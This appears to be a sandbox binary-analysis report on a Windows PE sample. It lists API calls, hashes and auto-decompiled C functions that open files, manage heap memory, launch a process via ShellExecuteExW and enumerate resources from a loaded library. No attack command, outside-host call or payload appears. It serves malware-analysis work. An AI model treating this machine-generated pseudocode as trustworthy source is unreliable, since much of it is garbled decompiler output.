0x004040d7
0x004040e1
0x004040e6
0x004040ed
0x004040f2
0x004040f5
0x004040fa
0x004040ff
0x0040410b
0x00404110
0x00404113
0x00000000
0x00000000
0x00000000
0x00404113
0x0040411a
0x0040411f
0x00404128
0x0040412d
0x00404130
0x00000000
0x00000000
0x00404132
0x0040413a
0x0040413e
0x00404145
0x0040414a
0x0040414b
0x0040414c
0x0040414d
0x0040415c
0x00404166
0x0040416b
0x00404172
0x00404177
0x0040417a
0x0040417f
0x00404184
0x00404190
0x00404195
0x00404198
0x00000000
0x00000000
0x00000000
0x00404198
0x0040419f
0x004041a4
0x004041ad
0x004041b2
0x004041b5
0x00000000
0x00000000
0x004041b7
0x004041bf
0x004041c3
0x004041ca
0x004041cf
0x004041d0
0x004041d1
0x004041d2
0x004041e1
0x004041eb
0x004041f0
0x004041f7
0x004041fc
0x004041ff
0x00404204
0x00404209
0x00404215
0x0040421a
0x0040421d
0x00000000
0x00000000
0x00000000
0x0040421d
0x00404224
0x00404229
0x00404232
0x00404237
0x0040423a
0x00000000
0x00000000
0x0040423c
0x00404244
0x00404248
0x0040424f
0x00404254
0x00404255
0x00404256
0x00404257
0x00404266
0x00404270
0x00404275
0x0040427c
0x00404281
0x00404284
0x00404289
0x0040428e
0x0040429a
0x0040429f
0x0040429f
0x004042a2
0x00000000
0x00000000
0x00000000
0x004042a2
0x004042a4
0x004042ab
0x004042b0
0x004042b3
0x004042b8
0x004042bd
0x004042c9
0x004042cf
0x004042d4
0x004042de
0x004042e8
0x004042f2
0x00404300
0x00404306
0x0040430b
0x0040430c
0x0040430e
0x00404313
0x00404314
0x00404316
0x0040431b
0x0040431c
0x0040431e
0x00404323
0x00404335
0x0040433a
0x0040433d
0x00404346
0x00404347
0x0040434d
0x00404352
0x00404353
0x00404355
0x0040435a
0x0040435b
0x0040435d
0x00404362
0x00404363
0x00404365
0x0040436a
0x0040437a
0x0040437f
0x00404382
0x0040438b
0x0040438c
0x0040439a
0x0040439f
0x004043a4
0x004043af
0x004043b4
0x004043bd
0x004043c3
0x004043c8
0x004043c9
0x004043ca
0x004043d5
0x004043d6
0x004043d7
0x004043dd
0x004043e9
0x004043f4
0x004043fd
0x00404403
0x00404408
0x00404409
0x0040440b
0x00404410
0x00404418
0x00404426
0x0040442b
0x00404434
0x00404439
0x00404440
0x00404445
0x00404448
0x0040444d
0x00404454
0x00404460
0x00404466
0x0040446b
0x00404471
0x0040447b
0x00404480
0x00404485
0x0040448c
0x00404491
0x00404494
0x0040449e
0x004044a7
0x004044b0
0x004044b1
0x004044b6
0x004044b9
0x004044c4
0x004044c9
0x004044ce
0x004044d8
0x004044e1
0x004044e6
0x004044ec
0x004044ef
0x0040450d
0x004044f1
0x00404502
0x00404502
0x00404512
0x00404519
0x0040451e
0x0040451f
0x00404524
0x00404525
0x00404527
0x00404532
0x00404537
0x0040453c
0x00404541
0x00404547
0x0040454c
0x0040454d
0x0040454e
0x00404556
0x0040455b
0x00404564
0x00404565
0x0040456a
0x0040456d
0x00404572
0x0040457c
0x00404581
0x00404584
0x00404589
0x0040458d
0x00404592
0x004045a0
0x004045a4
0x004045a8
0x0040460d

APIs

Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040DE6C
Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(02790000,00000000,?), ref: 0040DE99

Part of subcall function 0040DE20: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE26
Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000001B), ref: 0040DE35
Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B

Part of subcall function 0040DFC0: wcslen.MSVCRT ref: 0040DFD7

Part of subcall function 0040DE60: RtlReAllocateHeap.NTDLL(02790000,00000000,?,?), ref: 0040DEBC

GetModuleHandleW.KERNEL32(00000000,?,?,?,00000000,00000000,?,02799B50,00000000,00000000), ref: 004042FB
PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 004043F4

Part of subcall function 00402BFA: GetShortPathNameW.KERNEL32 ref: 00402C34

Part of subcall function 0040E020: TlsGetValue.KERNEL32(0000001B,?,?,00401DCE,00000000,00000000,00000000,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000), ref: 0040E02A

Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189

Part of subcall function 00409860: SetEnvironmentVariableW.KERNELBASE(02799B50,02799B50,00404434,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409879

Part of subcall function 00401E55: PathQuoteSpacesW.SHLWAPI(?,00000000,00000000,00000000,00000000,00000000,00000000,-00000004,00404476,00000000,00000000,00000000,02799B50,02798958,00000000,00000000), ref: 00401E8A

PathQuoteSpacesW.SHLWAPI(00000000,00000001,027989D0,00000000,00000000,00000000,00000000,00000000,02799B50,02798958,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004044A7
PathQuoteSpacesW.SHLWAPI(00000000,00000000,00000000,00416026,00000000,00000000,00000000,00000001,027989D0,00000000,00000000,00000000,00000000,00000000,02799B50,02798958), ref: 004044E1

Part of subcall function 00405492: CreateThread.KERNEL32 ref: 004054AB
Part of subcall function 00405492: EnterCriticalSection.KERNEL32(004176A0,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054BD
Part of subcall function 00405492: WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054D4
Part of subcall function 00405492: CloseHandle.KERNEL32(00000008,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054E0
Part of subcall function 00405492: LeaveCriticalSection.KERNEL32(004176A0,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 00405523

Strings

&`A, xrefs: 004044BE
`A, xrefs: 00404090
&`A, xrefs: 0040452C

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: Path$Value$QuoteSpaces$AllocateCriticalErrorHandleHeapLastSection$BackslashCloseCreateEnterEnvironmentLeaveModuleNameObjectRemoveShortSingleThreadVariableWaitwcslen
String ID: &`A$&`A$`A
API String ID: 1881381519-2092548216
Opcode ID: d8c64dcd585f1b5e06573cdc086111ceee2949358ebd607d45979ef17bbfe3ff
Instruction ID: 95625e34f548e5502c8bb68b533fb61ff434c3c21d69ae2a44b2ba18bfe99ca0
Opcode Fuzzy Hash: d8c64dcd585f1b5e06573cdc086111ceee2949358ebd607d45979ef17bbfe3ff
Instruction Fuzzy Hash: 1822E9B5914700AED200BBF1DD8197F77BDEB98718F10D83FB540AA192CA3CD8465B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA60, Relevance: 9.2, APIs: 6, Instructions: 157
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AA60(void* _a4, WCHAR* _a8, intOrPtr _a12, long _a16) {
				long _v4;
				long _v8;
				intOrPtr _t49;
				void* _t50;
				long _t52;
				long _t53;
				long _t61;
				void* _t62;
				long _t64;
				long _t66;
				void* _t67;
				signed int _t68;
				signed int _t70;
				void* _t71;
				void* _t72;
				void* _t73;

				_t68 = _a16;
				_t73 = 0;
				_t70 = _t68 & 0x0000001f;
				_v8 = _t70;
				if(_t70 == 0) {
					_v8 = 2;
				}
				_t72 = E0040D438( *0x41771c, _a4);
				if(_t72 == 0) {
					L40:
					return _t73;
				} else {
					_t49 = _a12;
					if(_t49 != 1) {
						if(_t49 != 2) {
							if(_t49 != 3) {
								_t71 = _a16;
								goto L23;
							} else {
								_t61 = 0;
								_a16 = 0;
								if((_t68 & 0x00020000) != 0) {
									_t61 = 1;
									_a16 = 1;
								}
								if((_t68 & 0x00040000) != 0) {
									_t61 = _t61 | 0x00000007;
									_a16 = _t61;
								}
								_t62 = CreateFileW(_a8, 0xc0000000, _t61, 0, 2, 0x80, 0); // executed
								_t71 = _t62;
								if(_t71 != 0xffffffff) {
									goto L24;
								} else {
									_t71 = CreateFileW(_a8, 0x40000000, _a16, 0, 5, 0, 0);
									goto L23;
								}
							}
						} else {
							_t64 = 0;
							if((_t68 & 0x00020000) != 0) {
								_t64 = 1;
							}
							if((_t68 & 0x00040000) != 0) {
								_t64 = _t64 | 0x00000007;
							}
							_t71 = CreateFileW(_a8, 0xc0000000, _t64, 0, 4, 0x80, 0);
							goto L23;
						}
					} else {
						_t66 = 0;
						if((_t68 & 0x00020000) != 0) {
							_t66 = 1;
						}
						if((_t68 & 0x00040000) != 0) {
							_t66 = _t66 | 0x00000007;
						}
						_t67 = CreateFileW(_a8, 0x80000000, _t66, 0, 3, 0x80, 0); // executed
						_t71 = _t67;
						L23:
						if(_t71 == 0xffffffff) {
							L36:
							_t50 = _a4;
							goto L37;
						} else {
							L24:
							if(_t71 == 0) {
								goto L36;
							} else {
								_t52 =  *0x41612c; // 0x1000
								if(_t52 == 0 || (_t68 & 0x00080000) != 0) {
									 *(_t72 + 4) = _t73;
								} else {
									 *(_t72 + 4) = HeapAlloc( *0x417008, 0, _t52);
								}
								 *_t72 = _t71;
								_t53 =  *0x41612c; // 0x1000
								 *(_t72 + 8) = _t53;
								 *(_t72 + 0x18) = _v8;
								 *(_t72 + 0xc) = _t73;
								 *(_t72 + 0x14) = 1;
								 *(_t72 + 0x1c) = 0 | _a12 == 0x00000001;
								if(_a12 == 2 && (_t68 & 0x00100000) != 0) {
									_v4 = _t73;
									SetFilePointer(_t71, 0,  &_v4, 2);
								}
								_t50 = _a4;
								_t73 = _t72;
								if(_t50 != 0xffffffff) {
									_t73 = _t71;
								}
								if(_t73 == 0) {
									L37:
									if(_t50 != 0xffffffff) {
										_t72 = _t50;
									}
									E0040D3AA( *0x41771c, _t72);
									goto L40;
								} else {
									return _t73;
								}
							}
						}
					}
				}
			}

0x0040aa64
0x0040aa6d
0x0040aa6f
0x0040aa72
0x0040aa76
0x0040aa78
0x0040aa78
0x0040aa8f
0x0040aa93
0x0040ac44
0x0040ac4b
0x0040aa99
0x0040aa99
0x0040aaa0
0x0040aae1
0x0040ab1f
0x0040ab88
0x00000000
0x0040ab21
0x0040ab21
0x0040ab23
0x0040ab2d
0x0040ab2f
0x0040ab34
0x0040ab34
0x0040ab3e
0x0040ab40
0x0040ab43
0x0040ab43
0x0040ab5c
0x0040ab62
0x0040ab67
0x00000000
0x0040ab69
0x0040ab84
0x00000000
0x0040ab84
0x0040ab67
0x0040aae3
0x0040aae3
0x0040aaeb
0x0040aaed
0x0040aaed
0x0040aaf8
0x0040aafa
0x0040aafa
0x0040ab18
0x00000000
0x0040ab18
0x0040aaa2
0x0040aaa2
0x0040aaaa
0x0040aaac
0x0040aaac
0x0040aab7
0x0040aab9
0x0040aab9
0x0040aad1
0x0040aad7
0x0040ab8c
0x0040ab8f
0x0040ac2b
0x0040ac2b
0x00000000
0x0040ab95
0x0040ab95
0x0040ab97
0x00000000
0x0040ab9d
0x0040ab9d
0x0040aba4
0x0040abc2
0x0040abae
0x0040abbd
0x0040abbd
0x0040abc5
0x0040abc7
0x0040abcc
0x0040abd3
0x0040abdd
0x0040abe3
0x0040abef
0x0040abf2
0x0040ac02
0x0040ac0a
0x0040ac0a
0x0040ac10
0x0040ac14
0x0040ac19
0x0040ac1b
0x0040ac1b
0x0040ac1f
0x0040ac2f
0x0040ac32
0x0040ac34
0x0040ac34
0x0040ac3d
0x00000000
0x0040ac23
0x0040ac2a
0x0040ac2a
0x0040ac1f
0x0040ab97
0x0040ab8f
0x0040aaa0

APIs

CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,?,?,00000001,00000000), ref: 0040AAD1
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,?,?,?,00000001,00000000), ref: 0040AB12
CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00000001,00000000), ref: 0040AB5C
CreateFileW.KERNEL32(?,40000000,?,00000000,00000005,00000000,00000000,?,?,?,00000001,00000000), ref: 0040AB7E
HeapAlloc.KERNEL32(00000000,00001000,?,?,?,?,00000001,00000000), ref: 0040ABB7
SetFilePointer.KERNEL32(?,00000000,?,00000002), ref: 0040AC0A

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Create$AllocHeapPointer
String ID:
API String ID: 4207849991-0
Opcode ID: 03187de23769bf5a714144439e1d921a106fae5db2cc0e7624616ee37dc51610
Instruction ID: 35cb0034da6faa60fecaa9fe6ab12df6337e8788845343623408397181d4bc5b
Opcode Fuzzy Hash: 03187de23769bf5a714144439e1d921a106fae5db2cc0e7624616ee37dc51610
Instruction Fuzzy Hash: E451B171204300ABE3218E28DC44B57BAE5EB44764F614A3AFA51A62E0D779EC55CB1E

Uniqueness

Uniqueness Score: -1.00%

Function 0040D7B9, Relevance: 7.6, APIs: 5, Instructions: 106
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D7B9(intOrPtr _a4, signed int _a8, intOrPtr _a12, signed char _a16) {
				intOrPtr _v0;
				signed char _t32;
				void* _t33;
				intOrPtr* _t41;
				intOrPtr _t47;
				signed int _t49;
				void* _t50;
				signed int _t52;
				signed int _t54;
				intOrPtr* _t55;
				void* _t56;
				signed int _t58;

				_t32 = _a16;
				_t50 = 4;
				_t49 = _a4 + _t50;
				_t54 = _t32 & 0x00000003;
				_t56 = 0;
				_t52 = _t49 & 0x00000003;
				if(_t52 != 0) {
					_t49 = _t49 + _t50;
				}
				if((_t32 & 0x00000004) == 0) {
					_t33 = RtlAllocateHeap( *0x417008, 0, 0x38); // executed
					_t56 = _t33;
					if(_t56 != 0) {
						 *((intOrPtr*)(_t56 + 0x14)) = _v0;
						 *((intOrPtr*)(_t56 + 0x18)) = _a4;
						 *_t56 = 0;
						 *((intOrPtr*)(_t56 + 4)) = 0;
						 *((intOrPtr*)(_t56 + 8)) = 0;
						 *(_t56 + 0x10) = _t49;
						if(_t54 == 1 || _t54 == 0) {
							 *((intOrPtr*)(_t56 + 0x1c)) = 1;
							_t31 = _t56 + 0x20; // 0x20
							InitializeCriticalSection(_t31);
						} else {
							 *((intOrPtr*)(_t56 + 0x1c)) = 0;
						}
					}
					goto L21;
				} else {
					E0040D9E3(_t50, 0x417614, E0040D982);
					EnterCriticalSection(0x41761c);
					_t41 =  *0x417618; // 0x2590fa8
					_t58 = _a8;
					while(_t41 != 0) {
						if( *((intOrPtr*)(_t41 + 0xc)) != _t49 ||  *((intOrPtr*)(_t41 + 0x10)) != _t58) {
							_t41 =  *_t41;
							continue;
						} else {
							 *((intOrPtr*)(_t41 + 0x14)) =  *((intOrPtr*)(_t41 + 0x14)) + 1;
							_t56 =  *(_t41 + 8);
							if(_t56 != 0) {
								L15:
								LeaveCriticalSection(0x41761c);
								L21:
								return _t56;
							}
							L10:
							_t55 = HeapAlloc( *0x417008, 0, 0x18);
							if(_t55 != 0) {
								_t12 = _t49 - 4; // -4
								_t56 = E0040D7B9(_t12, _a8, _a12, _t58 & 0xfffffffb);
								if(_t56 != 0) {
									_t47 =  *0x417618; // 0x2590fa8
									 *((intOrPtr*)(_t56 + 8)) = _t55;
									 *(_t55 + 4) =  *(_t55 + 4) & 0x00000000;
									 *(_t55 + 8) = _t56;
									 *(_t55 + 0xc) = _t49;
									 *(_t55 + 0x10) = _t58;
									 *((intOrPtr*)(_t55 + 0x14)) = 1;
									 *_t55 = _t47;
									if(_t47 != 0) {
										 *((intOrPtr*)(_t47 + 4)) = _t55;
									}
									 *0x417618 = _t55;
								}
							}
							goto L15;
						}
					}
					goto L10;
				}
			}

0x0040d7b9
0x0040d7c7
0x0040d7c8
0x0040d7d0
0x0040d7d3
0x0040d7d5
0x0040d7d8
0x0040d7dc
0x0040d7dc
0x0040d7e0
0x0040d89b
0x0040d8a1
0x0040d8a5
0x0040d8ab
0x0040d8b2
0x0040d8b8
0x0040d8ba
0x0040d8bd
0x0040d8c0
0x0040d8c5
0x0040d8d0
0x0040d8d3
0x0040d8d7
0x0040d8cb
0x0040d8cb
0x0040d8cb
0x0040d8c5
0x00000000
0x0040d7e6
0x0040d7f0
0x0040d7fa
0x0040d800
0x0040d805
0x0040d817
0x0040d80e
0x0040d815
0x00000000
0x0040d81d
0x0040d81d
0x0040d820
0x0040d825
0x0040d885
0x0040d88a
0x0040d8de
0x0040d8e3
0x0040d8e3
0x0040d827
0x0040d837
0x0040d83b
0x0040d847
0x0040d854
0x0040d858
0x0040d85a
0x0040d85f
0x0040d862
0x0040d866
0x0040d869
0x0040d86c
0x0040d86f
0x0040d876
0x0040d87a
0x0040d87c
0x0040d87c
0x0040d87f
0x0040d87f
0x0040d858
0x00000000
0x0040d83b
0x0040d80e
0x00000000
0x0040d81b

APIs

EnterCriticalSection.KERNEL32(0041761C,00417614,0040D982,00000000,FFFFFFED,00000200,77E34620,00409E16,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040D7FA
HeapAlloc.KERNEL32(00000000,00000018,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040D831
LeaveCriticalSection.KERNEL32(0041761C,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040D88A
RtlAllocateHeap.NTDLL(00000000,00000038,00000000,FFFFFFED,00000200,77E34620,00409E16,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040D89B
InitializeCriticalSection.KERNEL32(00000020,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040D8D7

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Heap$AllocAllocateEnterInitializeLeave
String ID:
API String ID: 1272335518-0
Opcode ID: 2ec9cf42e2d1736302ec14762d145b98cb1fe75a1bb67cb2000ecd2b7010510a
Instruction ID: 1c1621ef8b81eb37d3c39fa836f306ed5b79470d652240547c7f2301dbf87725
Opcode Fuzzy Hash: 2ec9cf42e2d1736302ec14762d145b98cb1fe75a1bb67cb2000ecd2b7010510a
Instruction Fuzzy Hash: DE31A2B2D007019BC3209F99D844A57BBF4FB44760B15C53EE465A7390D738E908CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00402022, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00402022() {
				intOrPtr _t31;
				intOrPtr _t33;
				intOrPtr _t35;
				intOrPtr _t37;
				int _t39;
				int _t41;
				long _t43;
				void* _t51;
				intOrPtr* _t55;
				intOrPtr* _t57;

				_t51 = 0x14;
				do {
					_t57 = _t57 - 4;
					 *_t57 = 0;
					_t51 = _t51 - 1;
				} while (_t51 != 0);
				E0040DF60();
				E00405060(_t57,  *((intOrPtr*)(_t57 + 0x5c)));
				E00405060(_t57 + 4,  *((intOrPtr*)(_t57 + 0x60)));
				E00405060(_t57 + 8,  *((intOrPtr*)(_t57 + 0x64)));
				_t55 = _t57 + 0xc;
				 *_t55 = 0x3c;
				 *((intOrPtr*)(_t55 + 4)) = 0x140;
				 *((intOrPtr*)(_t55 + 0x1c)) = 0;
				_push(L"open");
				_pop(_t31);
				 *((intOrPtr*)(_t55 + 0xc)) = _t31;
				_t33 =  *_t57;
				 *((intOrPtr*)(_t55 + 0x10)) = _t33;
				_t35 =  *((intOrPtr*)(_t57 + 8));
				 *((intOrPtr*)(_t55 + 0x14)) = _t35;
				_t37 =  *((intOrPtr*)(_t57 + 4));
				 *((intOrPtr*)(_t55 + 0x18)) = _t37;
				_t39 = ShellExecuteExW(_t57 + 0xc); // executed
				 *(_t57 + 0x48) = _t39;
				while(1) {
					_push(0x19); // executed
					E00405532(); // executed
					_t41 = GetExitCodeProcess( *(_t57 + 0x48), _t57 + 0x4c); // executed
					if(_t41 != 0 &&  *(_t57 + 0x4c) != 0x103) {
						break;
					}
				}
				_t43 =  *(_t57 + 0x4c);
				return E0040DEF0(E0040DEF0(E0040DEF0(_t43,  *_t57),  *((intOrPtr*)(_t57 + 4))),  *((intOrPtr*)(_t57 + 8)));
			}

0x00402024
0x00402029
0x00402029
0x0040202c
0x00402033
0x00402033
0x00402036
0x00402042
0x0040204f
0x0040205c
0x00402065
0x00402069
0x00402070
0x00402077
0x00402083
0x00402084
0x00402085
0x0040208c
0x0040208d
0x00402095
0x00402096
0x0040209e
0x0040209f
0x004020a7
0x004020ac
0x004020b0
0x004020b0
0x004020b5
0x004020c6
0x004020cd
0x00000000
0x00000000
0x004020dd
0x004020df
0x00402106

APIs

ShellExecuteExW.SHELL32(?), ref: 004020A7
GetExitCodeProcess.KERNEL32 ref: 004020C6

Strings

open, xrefs: 0040207E, 00402083, 0040208B

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: CodeExecuteExitProcessShell
String ID: open
API String ID: 1016612177-2758837156
Opcode ID: 4da19c96667bed9e9bef70d0c438878542b475c9845e05a44f1d331ba8485070
Instruction ID: f63886f370766692049a8ab09fc70fe74b01992a8596c344147a8d3c31b217da
Opcode Fuzzy Hash: 4da19c96667bed9e9bef70d0c438878542b475c9845e05a44f1d331ba8485070
Instruction Fuzzy Hash: E9218971008309AFD700EF64C845A9FBBE9EF44308F10882EF198A6291DB79D905DB96

Uniqueness

Uniqueness Score: -1.00%

Function 00401B8F, Relevance: 4.7, APIs: 3, Instructions: 233
libraryCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E00401B8F(void* __ecx, void* __edx, void* __eflags) {
				intOrPtr __ebp;
				void* _t28;
				void* _t29;
				void* _t30;
				struct HINSTANCE__* _t33;
				void* _t51;
				void* _t52;
				void* _t53;
				void* _t54;
				struct HINSTANCE__** _t56;
				void* _t57;

				_t57 = __eflags;
				_t51 = __edx;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				E0040DF60();
				_t28 = E0040DE20();
				_t52 = _t51;
				_push(_t28);
				_push(2);
				_push(0);
				_t29 = E0040DE20();
				_t53 = _t52;
				_push(_t29);
				_t30 = E0040DE20();
				_t54 = _t53;
				E00405182(E00409638(_t57, _t30));
				 *_t56 =  *_t56 + _t54; // executed
				_t33 = LoadLibraryExW(??, ??, ??); // executed
				 *_t56 = E004051A0(_t33);
				EnumResourceTypesW(_t56[2], E00402109, 0);
				FreeLibrary( *_t56);
				if(E0040A3E3( *0x4170a8) <= 0) {
					goto L1;
				} else {
					__eax = E0040A3ED( *0x4170a8);
					while(1) {
						__eax = E0040A402( *0x4170a8);
						__eax = __eax;
						__eflags = __eax;
						if(__eax == 0) {
							break;
						}
						__ebp =  *0x4170ac; // 0x0
						__edx =  *((intOrPtr*)(__ebp + 8));
						_push( *((intOrPtr*)(__ebp + 8)));
						__eax = E0040DE20();
						_pop(__edx);
						E0040DFC0(__edx) = __esp + 8;
						__eax = E0040DE60(__esp + 8, __esp + 8);
						__eax = E00405D80( *((intOrPtr*)(__esp + 4)));
						__eflags = __eax - 0xa;
						if(__eax <= 0xa) {
							__edx =  *((intOrPtr*)(__esp + 4));
							_push( *((intOrPtr*)(__esp + 4)));
							__eax = E0040DE20();
							_pop(__edx);
							E0040DFC0(__edx) = __esp + 0x10;
							__eax = E0040DE60(__esp + 0x10, __esp + 0x10);
						} else {
							__edx =  *((intOrPtr*)(__esp + 8));
							_push( *((intOrPtr*)(__esp + 8)));
							__eax = E0040DE20();
							_pop(__edx);
							__eax = E0040DFC0(__edx);
							__edx =  *((intOrPtr*)(__esp + 8));
							E0040DFC0( *((intOrPtr*)(__esp + 8))) = __esp + 0xc;
							__eax = E0040DE60(__esp + 0xc, __esp + 0xc);
						}
					}
					_push( *0x4170a8);
					__eax = E0040A436();
					__eax = E0040DE20();
					__edx = __edx;
					_push(__eax);
					__eax = E0040DE20();
					__edx = __edx;
					_push(__eax);
					__eax = E0040DE20();
					__edx = __edx;
					_push(__eax);
					__eax = E0040DE20();
					__edx = __edx;
					_push(__eax);
					_push(1);
					__eax = E0040DE20();
					__edx = __edx;
					_push(__eax);
					__eax = E0040DE20();
					__edx = __edx;
					E00405DB0( *((intOrPtr*)(__esp + 0x24))) = E00405182(__eax);
					 *__esp =  *__esp + __edx;
					E0040D0A0() = E00405182(__eax);
					 *__esp =  *__esp + __edx;
					__eax = __esp + 0x14;
					_push(__esp + 0x14);
					__eax = E0040DE60();
					__edx =  *((intOrPtr*)(__esp + 0x10));
					_push( *((intOrPtr*)(__esp + 0x10)));
					__eax = E0040DE20();
					_pop(__edx);
					E0040DFC0(__edx) = __esp + 0x18;
					__eax = E0040DE60(__esp + 0x18, __esp + 0x18);
					__eax = E0040DE20();
					__edx = __edx;
					_push(__eax);
					__eax = E0040DE20();
					__edx = __edx;
					_push(__eax);
					__eax = E0040DE20();
					__edx = __edx;
					_push(__eax);
					__eax = E0040DE20();
					__edx = __edx;
					__eax = E00405182(__eax);
					 *__esp =  *__esp + __edx;
					__eflags =  *__esp;
					E00405E50(__ecx,  *__esp) = __esp + 0x14;
					_push(__esp + 0x14);
					__eax = E0040DE60();
					__eax = E0040DE20();
					__edx = __edx;
					_push(__eax);
					__eax = E0040DE20();
					__edx = __edx;
					E00405EC0(__eflags,  *((intOrPtr*)(__esp + 0x1c)), 0xa) = __esp + 0x14;
					__eax = E0040DE60(__esp + 0x14, __esp + 0x14);
					_push( *((intOrPtr*)(__esp + 0xc)));
					__edx =  *((intOrPtr*)(__esp + 0x14));
					_pop(__ecx);
					__eax = E00405120(__ecx, __edx);
					if(__eflags == 0) {
						L1:
						_push(0);
						L3();
						E0040DE00();
						HeapDestroy( *0x417008);
						ExitProcess(??);
						E00405379();
						E004098F0();
						E0040A655();
						E0040D264(E0040AA30());
						return E00409AD0();
					} else {
						__eax = E004097FE();
						__eax = __eax;
						__eflags = __eax;
						if(__eflags != 0) {
							__eax = E0040DE20();
							__edx = __edx;
							__eax = E0040DE20();
							__edx = __edx;
							__eax = E0040E020(__ecx);
							__edx =  *((intOrPtr*)(__esp + 0x18));
							__ecx = __eax;
							__ecx = E00405160(__ecx);
							__eax = E00405120(__eax, __edx);
							if(__eflags != 0) {
								 *0x417050 = 1;
								__eax = E0040DE20();
								__edx = __edx;
								_push(__eax);
								__eax = E0040DE20();
								__edx = __edx;
								__eax = 0x417020;
								_push(0x417020);
								__eax = E0040DE60();
							}
						}
						__eax = E0040DEF0(__eax,  *((intOrPtr*)(__esp + 4)));
						__eax = E0040DEF0(__eax,  *((intOrPtr*)(__esp + 0xc)));
						__eax = E0040DEF0(__eax,  *((intOrPtr*)(__esp + 8)));
						__eax = E0040DEF0(__eax,  *((intOrPtr*)(__esp + 0x14)));
						__eax = E0040DEF0(__eax,  *((intOrPtr*)(__esp + 0x10)));
						__esp = __esp + 0x18;
						_pop(__ebp);
						return __eax;
					}
				}
			}

0x00401b8f
0x00401b8f
0x00401b93
0x00401b94
0x00401b95
0x00401b96
0x00401b97
0x00401b98
0x00401b99
0x00401b9f
0x00401ba4
0x00401ba5
0x00401ba6
0x00401bab
0x00401bb1
0x00401bb6
0x00401bb7
0x00401bb9
0x00401bbe
0x00401bc5
0x00401bca
0x00401bcd
0x00401bd7
0x00401bea
0x00401bf2
0x00401c06
0x00000000
0x00401c0c
0x00401c12
0x00401c17
0x00401c1d
0x00401c22
0x00401c22
0x00401c24
0x00000000
0x00000000
0x00401c26
0x00401c2c
0x00401c2f
0x00401c30
0x00401c35
0x00401c3d
0x00401c42
0x00401c4b
0x00401c52
0x00401c55
0x00401c7f
0x00401c83
0x00401c84
0x00401c89
0x00401c91
0x00401c96
0x00401c57
0x00401c57
0x00401c5b
0x00401c5c
0x00401c61
0x00401c64
0x00401c69
0x00401c73
0x00401c78
0x00401c78
0x00401c9b
0x00401ca0
